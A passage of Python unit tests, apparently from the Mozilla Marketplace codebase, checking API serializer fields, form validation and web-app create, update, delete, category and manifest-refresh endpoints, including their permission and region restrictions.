result = field.field_to_native(self.app, 'description')
expected = self.app.description_translations
eq_(result, expected)
def _test_expected_single_string(self, field):
result = field.field_to_native(self.app, 'name')
expected = unicode(self.app.name_translations['en-US'])
eq_(result, expected)
result = field.field_to_native(self.app, 'description')
expected = unicode(self.app.description_translations['en-US'])
eq_(result, expected)
def test_field_to_native_source(self):
self.app.mymock = Mock()
self.app.mymock.mymockedfield_translations = self.app.name_translations
field = self.field_class(source='mymock.mymockedfield')
result = field.field_to_native(self.app, 'shouldbeignored')
expected = self.app.name_translations
eq_(result, expected)
def test_field_null(self):
field = self.field_class()
self.app.name_translations = {}
result = field.field_to_native(self.app, 'name')
eq_(result, None)
self.app.description_translations = None
result = field.field_to_native(self.app, 'description')
eq_(result, None)
class SlugOrPrimaryKeyRelatedFieldTests(TestCase):
fixtures = fixture('webapp_337141')
def test_render_as_pks(self):
app = Webapp.objects.get(pk=337141)
c1 = Category.objects.create(name='delicious', slug='foo',
type=amo.ADDON_WEBAPP)
c2 = Category.objects.create(name='scrumptious', slug='baz',
type=amo.ADDON_WEBAPP)
AddonCategory.objects.create(addon=app, category=c1)
AddonCategory.objects.create(addon=app, category=c2)
field = SlugOrPrimaryKeyRelatedField(queryset=Category.objects.all(),
many=True)
eq_(field.field_to_native(app, 'categories'), [c1.pk, c2.pk])
def test_render_as_pk(self):
v = Version.objects.get(pk=1268829)
field = SlugOrPrimaryKeyRelatedField(queryset=Webapp.objects.all())
eq_(field.field_to_native(v, 'addon'), v.addon.pk)
def test_parse_as_pks(self):
c1 = Category.objects.create(name='delicious', slug='foo',
type=amo.ADDON_WEBAPP)
c2 = Category.objects.create(name='scrumptious', slug='baz',
type=amo.ADDON_WEBAPP)
into = {}
field = SlugOrPrimaryKeyRelatedField(queryset=Category.objects.all(),
many=True)
field.field_from_native({'categories': [c1.pk, c2.pk]}, None,
'categories', into)
eq_(into, {'categories': [c1, c2]})
def test_parse_as_pk(self):
app = Webapp.objects.get(pk=337141)
into = {}
field = SlugOrPrimaryKeyRelatedField(queryset=Webapp.objects.all())
field.field_from_native({'addon': 337141}, None, 'addon', into)
eq_(into, {'addon': app})
def test_render_as_slugs(self):
app = Webapp.objects.get(pk=337141)
c1 = Category.objects.create(name='delicious', slug='foo',
type=amo.ADDON_WEBAPP)
c2 = Category.objects.create(name='scrumptious', slug='baz',
type=amo.ADDON_WEBAPP)
AddonCategory.objects.create(addon=app, category=c1)
AddonCategory.objects.create(addon=app, category=c2)
field = SlugOrPrimaryKeyRelatedField(queryset=Category.objects.all(),
render_as='slug',
slug_field='slug',
many=True)
eq_(field.field_to_native(app, 'categories'), [c1.slug, c2.slug])
def test_render_as_slug(self):
v = Version.objects.get(pk=1268829)
field = SlugOrPrimaryKeyRelatedField(queryset=Webapp.objects.all(),
render_as='slug',
slug_field='app_slug')
eq_(field.field_to_native(v, 'addon'), v.addon.app_slug)
def test_parse_as_slugs(self):
c1 = Category.objects.create(name='delicious', slug='foo',
type=amo.ADDON_WEBAPP)
c2 = Category.objects.create(name='scrumptious', slug='baz',
type=amo.ADDON_WEBAPP)
into = {}
field = SlugOrPrimaryKeyRelatedField(queryset=Category.objects.all(),
many=True)
field.field_from_native({'categories': [c1.slug, c2.slug]}, None,
'categories', into)
eq_(into, {'categories': [c1, c2]})
def test_parse_as_slug(self):
app = Webapp.objects.get(pk=337141)
into = {}
field = SlugOrPrimaryKeyRelatedField(queryset=Webapp.objects.all(),
slug_field='app_slug')
field.field_from_native({'addon': app.app_slug}, None, 'addon', into)
eq_(into, {'addon': app})
class Spud(object):
pass
class Potato(object):
def __init__(self, spud):
self.spud = spud
class SpudSerializer(Serializer):
pass
class PotatoSerializer(Serializer):
spud = SplitField(CharField(), SpudSerializer())
class TestSplitField(TestCase):
def setUp(self):
self.request = RequestFactory().get('/')
self.spud = Spud()
self.potato = Potato(self.spud)
self.serializer = PotatoSerializer(self.potato,
context={'request': self.request})
def test_initialize(self):
"""
Test that the request context is passed from PotatoSerializer's context
to the context of `PotatoSerializer.spud.output`.
"""
field = self.serializer.fields['spud']
eq_(self.request, field.output.context['request'],
self.serializer.context['request'])
ok_(not hasattr(field.input, 'context'))
########NEW FILE########
__FILENAME__ = test_forms
import base64
from django.core.exceptions import ValidationError
import mock
from nose.tools import eq_, ok_
import amo
import amo.tests
from mkt.api.forms import (PreviewJSONForm, SchemeURLValidator,
SluggableModelChoiceField)
class TestPreviewForm(amo.tests.TestCase, amo.tests.AMOPaths):
def setUp(self):
self.file = base64.b64encode(open(self.mozball_image(), 'r').read())
def test_bad_type(self):
form = PreviewJSONForm({'file': {'data': self.file, 'type': 'wtf?'},
'position': 1})
assert not form.is_valid()
eq_(form.errors['file'], ['Images must be either PNG or JPG.'])
def test_bad_file(self):
file_ = base64.b64encode(
open(self.packaged_app_path('mozball.zip'), 'r').read())
form = PreviewJSONForm({'file': {'data': file_, 'type': 'image/png'},
'position': 1})
assert not form.is_valid()
eq_(form.errors['file'], ['Images must be either PNG or JPG.'])
def test_position_missing(self):
form = PreviewJSONForm({'file': {'data': self.file,
'type': 'image/jpg'}})
assert not form.is_valid()
eq_(form.errors['position'], ['This field is required.'])
def test_preview(self):
form = PreviewJSONForm({'file': {'type': '', 'data': ''},
'position': 1})
assert not form.is_valid()
eq_(form.errors['file'], ['Images must be either PNG or JPG.'])
def test_not_json(self):
form = PreviewJSONForm({'file': 1, 'position': 1})
assert not form.is_valid()
eq_(form.errors['file'], ['File must be a dictionary.'])
def test_not_file(self):
form = PreviewJSONForm({'position': 1})
assert not form.is_valid()
eq_(form.errors['file'], ['This field is required.'])
class TestSluggableChoiceField(amo.tests.TestCase):
def setUp(self):
self.fld = SluggableModelChoiceField(mock.Mock(),
sluggable_to_field_name='foo')
def test_nope(self):
with self.assertRaises(ValueError):
SluggableModelChoiceField()
def test_slug(self):
self.fld.to_python(value='asd')
ok_(self.fld.to_field_name, 'foo')
def test_pk(self):
self.fld.to_python(value='1')
ok_(self.fld.to_field_name is None)
def test_else(self):
self.fld.to_python(value=None)
ok_(self.fld.to_field_name is None)
class TestSchemeURLValidator(amo.tests.TestCase):
ftp_url = 'ftp://my-domain.com'
not_a_url = 'not-a-url'
def test_url_validator_invalid_url(self):
with self.assertRaises(ValidationError):
SchemeURLValidator()(self.not_a_url)
def test_url_validator_no_schemes(self):
# Verify we do not see an exception as the URL is valid.
SchemeURLValidator()(self.ftp_url)
def test_url_validator_valid_scheme(self):
# Verify that the URL is still valid when we allow its scheme.
SchemeURLValidator(schemes=['ftp', 'http'])(self.ftp_url)
def test_url_validator_invalid_scheme(self):
with self.assertRaises(ValidationError):
SchemeURLValidator(schemes=['ftps', 'https'])(self.ftp_url)
########NEW FILE########
__FILENAME__ = test_handlers
import json
import os
import urllib
import tempfile
from decimal import Decimal
from StringIO import StringIO
from django.core.urlresolvers import reverse
from mock import patch
from nose.tools import eq_
from rest_framework.request import Request
from test_utils import RequestFactory
import amo
from access.models import Group, GroupUser
from addons.models import (Addon, AddonDeviceType, AddonUpsell,
AddonUser, Category, Preview)
from amo.tests import AMOPaths, app_factory, TestCase
from files.models import FileUpload
from reviews.models import Review
from tags.models import AddonTag, Tag
from users.models import UserProfile
import mkt
from mkt.api.models import Access, generate
from mkt.api.fields import LargeTextField
from mkt.api.tests.test_oauth import RestOAuthClient, RestOAuth
from mkt.constants import regions
from mkt.site.fixtures import fixture
from mkt.webapps.models import AddonExcludedRegion, Webapp
from mkt.prices.models import Price, PriceCurrency
class CreateHandler(RestOAuth):
fixtures = fixture('user_2519', 'platform_all')
def setUp(self):
super(CreateHandler, self).setUp()
self.list_url = reverse('app-list')
self.user = UserProfile.objects.get(pk=2519)
self.file = tempfile.NamedTemporaryFile('w', suffix='.webapp').name
self.manifest_copy_over(self.file, 'mozball-nice-slug.webapp')
self.categories = []
for x in range(0, 2):
self.categories.append(Category.objects.create(
name='cat-%s' % x,
slug='cat-%s' % x,
type=amo.ADDON_WEBAPP))
self.categories.append(Category.objects.create(
name='cat-%s' % x,
slug='cat-%s' % x,
type=amo.ADDON_EXTENSION))
def create(self, fil=None):
if fil is None:
fil = self.file
return FileUpload.objects.create(user=self.user, path=fil,
name=fil, valid=True)
def _mock_fetch_content(url):
return open(os.path.join(os.path.dirname(__file__),
'..', '..', 'developers', 'tests', 'icons',
'337141-128.png'))
class TestAppCreateHandler(CreateHandler, AMOPaths):
fixtures = fixture('app_firefox', 'platform_all', 'user_admin',
'user_2519', 'user_999')
def count(self):
return Addon.objects.count()
def test_verbs(self):
self.create()
self._allowed_verbs(self.list_url, ['get', 'post'])
self.create_app()
self._allowed_verbs(self.get_url, ['get', 'put', 'delete'])
def test_not_accepted_tos(self):
self.user.update(read_dev_agreement=None)
obj = self.create()
res = self.client.post(self.list_url,
data=json.dumps({'manifest': obj.uuid}))
eq_(res.status_code, 403)
eq_(res.json, {'detail': 'Terms of Service not accepted.'})
def test_not_valid(self):
obj = self.create()
obj.update(valid=False)
res = self.client.post(self.list_url,
data=json.dumps({'manifest': obj.uuid}))
eq_(res.status_code, 400)
eq_(res.json['detail'], 'Upload not valid.')
eq_(self.count(), 0)
def test_not_there(self):
res = self.client.post(self.list_url,
data=json.dumps({'manifest':
'some-random-32-character-stringy'}))
eq_(res.status_code, 400)
eq_(res.json['detail'], 'No upload found.')
eq_(self.count(), 0)
def test_anon(self):
obj = self.create()
obj.update(user=None)
res = self.client.post(self.list_url,
data=json.dumps({'manifest': obj.uuid}))
eq_(res.status_code, 403)
eq_(self.count(), 0)
def test_not_yours(self):
obj = self.create()
obj.update(user=UserProfile.objects.get(email='[email protected]'))
res = self.client.post(self.list_url,
data=json.dumps({'manifest': obj.uuid}))
eq_(res.status_code, 403)
eq_(self.count(), 0)
@patch('mkt.webapps.views.record_action')
def test_create(self, record_action):
obj = self.create()
res = self.client.post(self.list_url,
data=json.dumps({'manifest': obj.uuid}))
eq_(res.status_code, 201)
content = json.loads(res.content)
eq_(content['status'], 0)
eq_(content['slug'], u'mozillaball')
eq_(content['support_email'], None)
eq_(self.count(), 1)
app = Webapp.objects.get(app_slug=content['slug'])
eq_(set(app.authors.all()), set([self.user]))
assert record_action.called
def create_app(self, fil=None):
obj = self.create(fil)
res = self.client.post(self.list_url,
data=json.dumps({'manifest': obj.uuid}))
pk = json.loads(res.content)['id']
self.get_url = reverse('app-detail', kwargs={'pk': pk})
return Webapp.objects.get(pk=pk)
def test_upsell(self):
app = self.create_app()
upsell = app_factory()
self.make_premium(upsell)
AddonUpsell.objects.create(free=app, premium=upsell)
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
obj = json.loads(res.content)['upsell']
eq_(obj['id'], upsell.id)
eq_(obj['app_slug'], upsell.app_slug)
eq_(obj['name'], upsell.name)
eq_(obj['icon_url'], upsell.get_icon_url(128))
eq_(obj['resource_uri'],
reverse('app-detail', kwargs={'pk': upsell.id}))
def test_get(self):
self.create_app()
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
content = json.loads(res.content)
eq_(content['status'], 0)
def test_get_slug(self):
app = self.create_app()
url = reverse('app-detail', kwargs={'pk': app.app_slug})
res = self.client.get(url)
content = json.loads(res.content)
eq_(content['id'], app.pk)
def test_list(self):
app = self.create_app()
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
content = json.loads(res.content)
eq_(content['meta']['total_count'], 1)
eq_(content['objects'][0]['id'], app.pk)
def test_list_anon(self):
eq_(self.anon.get(self.list_url).status_code, 403)
def test_get_device(self):
app = self.create_app()
AddonDeviceType.objects.create(addon=app,
device_type=amo.DEVICE_DESKTOP.id)
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
content = json.loads(res.content)
eq_(content['device_types'], [u'desktop'])
def test_not_public(self):
self.create_app()
res = self.anon.get(self.get_url)
eq_(res.status_code, 403)
def test_get_public(self):
app = self.create_app()
app.update(status=amo.STATUS_PUBLIC)
res = self.anon.get(self.get_url)
eq_(res.status_code, 200)
def test_get_previews(self):
app = self.create_app()
res = self.client.get(self.get_url)
eq_(len(json.loads(res.content)['previews']), 0)
Preview.objects.create(addon=app)
res = self.client.get(self.get_url)
eq_(len(json.loads(res.content)['previews']), 1)
def test_get_not_mine(self):
obj = self.create_app()
obj.authors.clear()
res = self.client.get(self.get_url)
eq_(res.status_code, 403)
def test_get_privacy_policy(self):
app = self.create_app()
data = self.base_data()
self.client.put(self.get_url, data=json.dumps(data))
app.reload()
app.authors.clear()
res = self.client.get(reverse('app-privacy-policy-detail',
args=[app.pk]))
eq_(res.status_code, 403)
def test_get_privacy_policy_anon(self):
app = self.create_app()
data = self.base_data()
self.client.put(self.get_url, data=json.dumps(data))
res = self.anon.get(reverse('app-privacy-policy-detail',
args=[app.pk]))
eq_(res.status_code, 403)
def test_get_privacy_policy_mine(self):
app = self.create_app()
data = self.base_data()
self.client.put(self.get_url, data=json.dumps(data))
res = self.client.get(reverse('app-privacy-policy-detail',
args=[app.pk]))
eq_(res.json['privacy_policy'], data['privacy_policy'])
def test_get_privacy_policy_slug(self):
app = self.create_app()
data = self.base_data()
self.client.put(self.get_url, data=json.dumps(data))
url = reverse('app-privacy-policy-detail', kwargs={'pk': app.app_slug})
res = self.client.get(url)
eq_(res.json['privacy_policy'], data['privacy_policy'])
def base_data(self):
return {
'support_email': '[email protected]',
'privacy_policy': 'wat',
'homepage': 'http://www.whatever.com',
'name': 'mozball',
'categories': [c.slug for c in
Category.objects.filter(type=amo.ADDON_WEBAPP)],
'description': 'wat...',
'premium_type': 'free',
'regions': ['us'],
'device_types': amo.DEVICE_LOOKUP.keys()
}
def test_put(self):
app = self.create_app()
res = self.client.put(self.get_url, data=json.dumps(self.base_data()))
eq_(res.status_code, 202)
app = Webapp.objects.get(pk=app.pk)
eq_(app.privacy_policy, 'wat')
def test_put_as_post(self):
# This is really a test of the HTTP_X_HTTP_METHOD_OVERRIDE header
# and that signing works correctly. Do a POST, but ask DRF to do
# a PUT.
app = self.create_app()
res = self.client.post(self.get_url, data=json.dumps(self.base_data()),
HTTP_X_HTTP_METHOD_OVERRIDE='PUT')
eq_(res.status_code, 202)
app = Webapp.objects.get(pk=app.pk)
eq_(app.privacy_policy, 'wat')
def test_put_anon(self):
app = self.create_app()
app.update(status=amo.STATUS_PUBLIC)
res = self.anon.put(self.get_url, data=json.dumps(self.base_data()))
eq_(res.status_code, 403)
def test_put_categories_worked(self):
app = self.create_app()
res = self.client.put(self.get_url, data=json.dumps(self.base_data()))
eq_(res.status_code, 202)
app = Webapp.objects.get(pk=app.pk)
eq_(set([c.pk for c in app.categories.all()]),
set([c.pk for c in Category.objects.filter(type=amo.ADDON_WEBAPP)]))
def test_post_content_ratings(self):
"""Test the @action on AppViewSet to attach the content ratings."""
app = self.create_app()
url = reverse('app-content-ratings', kwargs={'pk': app.pk})
res = self.client.post(url, data=json.dumps(
{'submission_id': 50, 'security_code': 'AB12CD3'}))
eq_(res.status_code, 201)
eq_(res.content, '')
def test_post_content_ratings_bad(self):
"""Test the @action on AppViewSet to attach the content ratings."""
app = self.create_app()
url = reverse('app-content-ratings', kwargs={'pk': app.pk})
# Missing `security_code`.
res = self.client.post(url, data=json.dumps({'submission_id': 50}))
eq_(res.status_code, 400)
eq_(json.loads(res.content),
{'security_code': ['This field is required.']})
def test_dehydrate(self):
app = self.create_app()
res = self.client.put(self.get_url, data=json.dumps(self.base_data()))
eq_(res.status_code, 202)
res = self.client.get(self.get_url + '?lang=en')
eq_(res.status_code, 200)
data = json.loads(res.content)
self.assertSetEqual(data['categories'],
[c.slug for c in app.categories.all()])
eq_(data['current_version'], app.current_version.version)
self.assertSetEqual(data['device_types'],
[n.api_name for n in amo.DEVICE_TYPES.values()])
eq_(data['homepage'], u'http://www.whatever.com')
eq_(data['is_packaged'], False)
eq_(data['author'], 'Mozilla Labs')
eq_(data['manifest_url'], app.manifest_url)
eq_(data['premium_type'], 'free')
eq_(data['price'], None)
eq_(data['price_locale'], None)
eq_(data['public_stats'], False)
eq_(data['support_email'], u'[email protected]')
eq_(data['ratings'], {'count': 0, 'average': 0.0})
eq_(data['user'], {'developed': True, 'installed': False,
'purchased': False})
def test_ratings(self):
app = self.create_app()
rater = UserProfile.objects.get(pk=999)
Review.objects.create(addon=app, user=self.user, body='yes', rating=3)
Review.objects.create(addon=app, user=rater, body='no', rating=2)
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['ratings'], {'count': 2, 'average': 2.5})
def test_put_wrong_category(self):
self.create_app()
wrong = Category.objects.create(name='wrong', slug='wrong',
type=amo.ADDON_EXTENSION,
application_id=amo.FIREFOX.id)
data = self.base_data()
data['categories'] = [wrong.slug]
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 400)
def test_put_no_categories(self):
self.create_app()
data = self.base_data()
del data['categories']
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 400)
eq_(res.json['categories'], ['This field is required.'])
def test_put_no_desktop(self):
self.create_app()
data = self.base_data()
del data['device_types']
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 400)
eq_(res.json['device_types'], ['This field is required.'])
def test_put_devices_worked(self):
app = self.create_app()
data = self.base_data()
data['device_types'] = [a.api_name for a in amo.DEVICE_TYPES.values()]
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 202)
app = Webapp.objects.get(pk=app.pk)
eq_(set(d for d in app.device_types),
set(amo.DEVICE_TYPES[d] for d in amo.DEVICE_TYPES.keys()))
def test_put_desktop_error_nice(self):
self.create_app()
data = self.base_data()
data['device_types'] = [12345]
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 400)
assert '12345' in res.json['device_types'][0], res.data
def create_price(self, price):
tier = Price.objects.create(price=price)
# This is needed for the serialisation of the app.
PriceCurrency.objects.create(tier=tier, price=price, provider=1,
region=regions.US.id)
def test_put_price(self):
app = self.create_app()
data = self.base_data()
self.create_price('1.07')
data['premium_type'] = 'premium'
data['price'] = '1.07'
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 202)
app = Webapp.objects.get(pk=app.pk)
eq_(str(app.get_price(region=regions.US.id)), '1.07')
def test_put_premium_inapp(self):
app = self.create_app()
data = self.base_data()
self.create_price('1.07')
data['premium_type'] = 'premium-inapp'
data['price'] = '1.07'
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 202)
app = Webapp.objects.get(pk=app.pk)
eq_(str(app.get_price(region=regions.US.id)), '1.07')
eq_(app.premium_type, amo.ADDON_PREMIUM_INAPP)
def test_put_bad_price(self):
self.create_app()
data = self.base_data()
self.create_price('1.07')
self.create_price('3.14')
data['premium_type'] = 'premium'
data['price'] = "2.03"
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 400)
eq_(res.json['price'][0],
'Premium app specified without a valid price. Price can be one of '
'"1.07", "3.14".')
def test_put_no_price(self):
self.create_app()
data = self.base_data()
Price.objects.create(price='1.07')
Price.objects.create(price='3.14')
data['premium_type'] = 'premium'
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 400)
eq_(res.json['price'][0],
'Premium app specified without a valid price. Price can be one of '
'"1.07", "3.14".')
def test_put_free_inapp(self):
app = self.create_app()
data = self.base_data()
data['premium_type'] = 'free-inapp'
res = self.client.put(self.get_url, data=json.dumps(data))
eq_(res.status_code, 202)
eq_(app.reload().get_price(region=regions.US.id), None)
# TODO: renable when regions are sorted out.
# def test_put_region_bad(self):
# self.create_app()
# data = self.base_data()
# data['regions'] = []
# res = self.client.put(self.get_url, data=json.dumps(data))
# eq_(res.status_code, 400)
#
# def test_put_region_good(self):
# app = self.create_app()
# data = self.base_data()
# data['regions'] = ['br', 'us', 'uk']
# res = self.client.put(self.get_url, data=json.dumps(data))
# eq_(res.status_code, 202)
# eq_(app.get_regions(), [regions.BR, regions.UK, regions.US])
def test_put_not_mine(self):
obj = self.create_app()
obj.authors.clear()
res = self.client.put(self.get_url, data='{}')
eq_(res.status_code, 403)
def test_put_not_there(self):
url = reverse('app-detail', kwargs={'pk': 123})
res = self.client.put(url, data='{}')
eq_(res.status_code, 404)
def test_delete(self):
obj = self.create_app()
res = self.client.delete(self.get_url)
eq_(res.status_code, 204)
assert not Webapp.objects.filter(pk=obj.pk).exists()
def test_delete_not_mine(self):
obj = self.create_app()
obj.authors.clear()
res = self.client.delete(self.get_url)
eq_(res.status_code, 403)
assert Webapp.objects.filter(pk=obj.pk).exists()
def test_reviewer_get(self):
app = self.create_app()
data = self.base_data()
self.client.put(self.get_url, data=json.dumps(data))
editor = UserProfile.objects.get(email='[email protected]')
g = Group.objects.create(rules='Apps:Review,Reviews:Edit')
GroupUser.objects.create(group=g, user=editor)
ac = Access.objects.create(key='adminOauthKey', secret=generate(),
user=editor)
client = RestOAuthClient(ac)
r = client.get(self.get_url)
eq_(r.status_code, 200)
res = client.get(reverse('app-privacy-policy-detail',
args=[app.pk]))
eq_(r.status_code, 200)
eq_(res.json['privacy_policy'], data['privacy_policy'])
def test_admin_get(self):
app = self.create_app()
data = self.base_data()
self.client.put(self.get_url, data=json.dumps(data))
admin = UserProfile.objects.get(email='[email protected]')
g = Group.objects.create(rules='*:*')
GroupUser.objects.create(group=g, user=admin)
ac = Access.objects.create(key='adminOauthKey', secret=generate(),
user=admin)
client = RestOAuthClient(ac)
r = client.get(self.get_url)
eq_(r.status_code, 200)
res = client.get(reverse('app-privacy-policy-detail',
args=[app.pk]))
eq_(r.status_code, 200)
eq_(res.json['privacy_policy'], data['privacy_policy'])
class CreatePackagedHandler(amo.tests.AMOPaths, RestOAuth):
fixtures = fixture('user_2519', 'platform_all')
def setUp(self):
super(CreatePackagedHandler, self).setUp()
self.list_url = reverse('app-list')
self.user = UserProfile.objects.get(pk=2519)
self.file = tempfile.NamedTemporaryFile('w', suffix='.zip').name
self.packaged_copy_over(self.file, 'mozball.zip')
self.categories = []
for x in range(0, 2):
self.categories.append(Category.objects.create(
name='cat-%s' % x,
type=amo.ADDON_WEBAPP))
def create(self):
return FileUpload.objects.create(user=self.user, path=self.file,
name=self.file, valid=True)
@patch('versions.models.Version.is_privileged', False)
class TestPackagedAppCreateHandler(CreatePackagedHandler):
fixtures = fixture('user_2519', 'platform_all')
def test_create(self):
obj = self.create()
res = self.client.post(self.list_url,
data=json.dumps({'upload': obj.uuid}))
eq_(res.status_code, 201)
content = json.loads(res.content)
eq_(content['status'], 0)
# Note the packaged status is not returned in the result.
app = Webapp.objects.get(app_slug=content['slug'])
eq_(app.is_packaged, True)
class TestListHandler(CreateHandler, AMOPaths):
fixtures = fixture('user_2519', 'user_999', 'platform_all')
def create(self, users):
app = Addon.objects.create(type=amo.ADDON_WEBAPP)
for user in users:
AddonUser.objects.create(user=user, addon=app)
return app
def create_apps(self, *all_owners):
apps = []
for owners in all_owners:
owners = [UserProfile.objects.get(pk=pk) for pk in owners]
apps.append(self.create(owners))
return apps
def test_create(self):
apps = self.create_apps([2519], [999])
res = self.client.get(self.list_url)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 1)
eq_(data['objects'][0]['id'], apps[0].pk)
def test_multiple(self):
apps = self.create_apps([2519], [999, 2519])
res = self.client.get(self.list_url)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 2)
pks = set([data['objects'][0]['id'], data['objects'][1]['id']])
eq_(pks, set([app.pk for app in apps]))
def test_lang(self):
app = app_factory(description={'fr': 'Le blah', 'en-US': 'Blah'})
url = reverse('app-detail', args=[app.pk])
res = self.client.get(url + '?lang=en')
eq_(json.loads(res.content)['description'], 'Blah')
res = self.client.get(url + '?lang=fr')
eq_(json.loads(res.content)['description'], 'Le blah')
class TestAppDetail(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self, api_name='apps'):
super(TestAppDetail, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.get_url = reverse('app-detail', kwargs={'pk': self.app.app_slug})
self.create_switch('iarc')
def test_price(self):
res = self.client.get(self.get_url)
data = json.loads(res.content)
eq_(data['price'], None)
def test_price_other_region(self):
res = self.client.get(self.get_url, {'lang': 'fr'})
data = json.loads(res.content)
eq_(data['price'], None)
def test_nonexistent_app(self):
"""
In combination with test_nonregion, this ensures that a distinction is
appropriately drawn between attempts to access nonexistent apps and
attempts to access apps that are unavailable due to legal restrictions.
"""
url = reverse('app-detail', kwargs={'pk': 1})
res = self.client.get(url)
eq_(res.status_code, 404)
def test_nonregion(self):
self.app.addonexcludedregion.create(region=regions.BR.id)
self.app.support_url = u'http://www.example.com/fake_support_url'
self.app.save()
res = self.client.get(self.get_url, data={'region': 'br'})
eq_(res.status_code, 451)
data = json.loads(res.content)['detail']
eq_(data['reason'], 'Not available in your region.')
eq_(data['support_email'], '')
eq_(data['support_url'], 'http://www.example.com/fake_support_url')
def test_owner_nonregion(self):
AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
AddonExcludedRegion.objects.create(addon_id=337141,
region=regions.BR.id)
res = self.client.get(self.get_url, data={'region': 'br'})
eq_(res.status_code, 200)
def test_packaged_manifest_url(self):
self.app.update(is_packaged=True)
res = self.client.get(self.get_url, pk=self.app.app_slug)
data = json.loads(res.content)
eq_(self.app.get_manifest_url(), data['manifest_url'])
def test_get_upsold(self):
free = Webapp.objects.create(status=amo.STATUS_PUBLIC)
AddonUpsell.objects.create(premium_id=337141, free=free)
res = self.client.get(self.get_url)
eq_(res.json['upsold'],
reverse('app-detail', kwargs={'pk': free.pk}))
def test_tags(self):
tag1 = Tag.objects.create(tag_text='example1')
tag2 = Tag.objects.create(tag_text='example2')
AddonTag.objects.create(tag=tag1, addon=self.app)
AddonTag.objects.create(tag=tag2, addon=self.app)
res = self.client.get(self.get_url, pk=self.app.app_slug)
data = json.loads(res.content)
eq_(data['tags'], ['example1', 'example2'])
def test_banner_message(self):
geodata = self.app.geodata
geodata.banner_regions = [mkt.regions.BR.id, mkt.regions.AR.id]
geodata.banner_message = u'Hello!'
geodata.save()
res = self.client.get(self.get_url + '?lang=en')
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['banner_message'], unicode(geodata.banner_message))
eq_(data['banner_regions'], [mkt.regions.AR.slug, mkt.regions.BR.slug])
class TestCategoryHandler(RestOAuth):
def setUp(self):
super(TestCategoryHandler, self).setUp()
self.cat = Category.objects.create(name='Webapp',
type=amo.ADDON_WEBAPP,
slug='thewebapp')
self.cat.name = {'fr': 'Le Webapp'}
self.cat.save()
self.other = Category.objects.create(name='other',
type=amo.ADDON_EXTENSION)
self.list_url = reverse('app-category-list')
self.get_url = reverse('app-category-detail',
kwargs={'pk': self.cat.pk})
def test_verbs(self):
self._allowed_verbs(self.list_url, ['get'])
self._allowed_verbs(self.get_url, ['get'])
def test_has_cors(self):
self.assertCORS(self.client.get(self.list_url), 'get')
def test_weight(self):
self.cat.update(weight=-1)
res = self.anon.get(self.list_url)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 0)
def test_get_slug(self):
url = reverse('app-category-detail', kwargs={'pk': self.cat.slug})
res = self.client.get(url)
data = json.loads(res.content)
eq_(data['id'], self.cat.pk)
def test_get_categories(self):
res = self.anon.get(self.list_url)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 1)
eq_(data['objects'][0]['name'], 'Webapp')
eq_(data['objects'][0]['slug'], 'thewebapp')
def test_get_category(self):
res = self.anon.get(self.get_url)
data = json.loads(res.content)
eq_(data['name'], 'Webapp')
def test_get_category_localised(self):
res = self.anon.get(self.get_url, HTTP_ACCEPT_LANGUAGE='fr')
data = json.loads(res.content)
eq_(data['name'], 'Le Webapp')
res = self.anon.get(self.get_url, HTTP_ACCEPT_LANGUAGE='en-US')
data = json.loads(res.content)
eq_(data['name'], 'Webapp')
def test_get_other_category(self):
res = self.anon.get(reverse('app-category-detail',
kwargs={'pk': self.other.pk}))
eq_(res.status_code, 404)
class TestErrorReporter(TestCase):
@patch('django.conf.settings.SENTRY_DSN', 'http://a:b@FAKE_DSN.com/123')
@patch('raven.base.Client.capture')
def test_error_reporter_forwards_to_sentry(self, mock_client):
sentry_data = {'message': 'Error!'}
query_params = {'sentry_data': json.dumps(sentry_data)}
path = '%s%s?%s' % (reverse('error-reporter'),
123,
urllib.urlencode(query_params))
response = self.client.get(path)
eq_(response.status_code, 204)
mock_client.assert_called_with('raven.events.Exception',
data=sentry_data)
MANIFEST = """
{"name": "Steamcubev2!",
"icons": {"128": "http://testmanifest.com/icon-128.png",
"48": "http://testmanifest.com/icon-48.png",
"16": "http://testmanifest.com/icon-16.png"},
"installs_allowed_from": ["*"],
"description":
"This app has been automatically generated by testmanifest.com",
"version": "1.0",
"developer": {"url": "http://mozilla.com", "name": "Mozilla Marketplace"}}
"""
@patch('mkt.developers.tasks._fetch_content')
@patch('mkt.webapps.tasks.validator')
class TestRefreshManifest(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141', 'platform_all')
def setUp(self):
super(TestRefreshManifest, self).setUp()
self.url = reverse('app-refresh-manifest-detail',
kwargs={'pk': 337141})
def test_anon(self, validator, fetch):
res = self.anon.post(self.url)
eq_(res.status_code, 403)
assert not fetch.called
def test_non_owner(self, validator, fetch):
res = self.client.post(self.url)
eq_(res.status_code, 403)
assert not fetch.called
def test_refresh(self, validator, fetch):
validator.side_effect = lambda pk: setattr(
FileUpload.objects.get(pk=pk), 'validation',
json.dumps({'success': True, 'messages': []}))
content = StringIO(MANIFEST)
content.headers = {
'Content-Type': 'application/x-web-app-manifest+json'}
fetch.return_value = content
AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
res = self.client.post(self.url)
eq_(res.status_code, 204)
assert fetch.called
def test_failed_refresh(self, validator, fetch):
fetch.side_effect = Exception
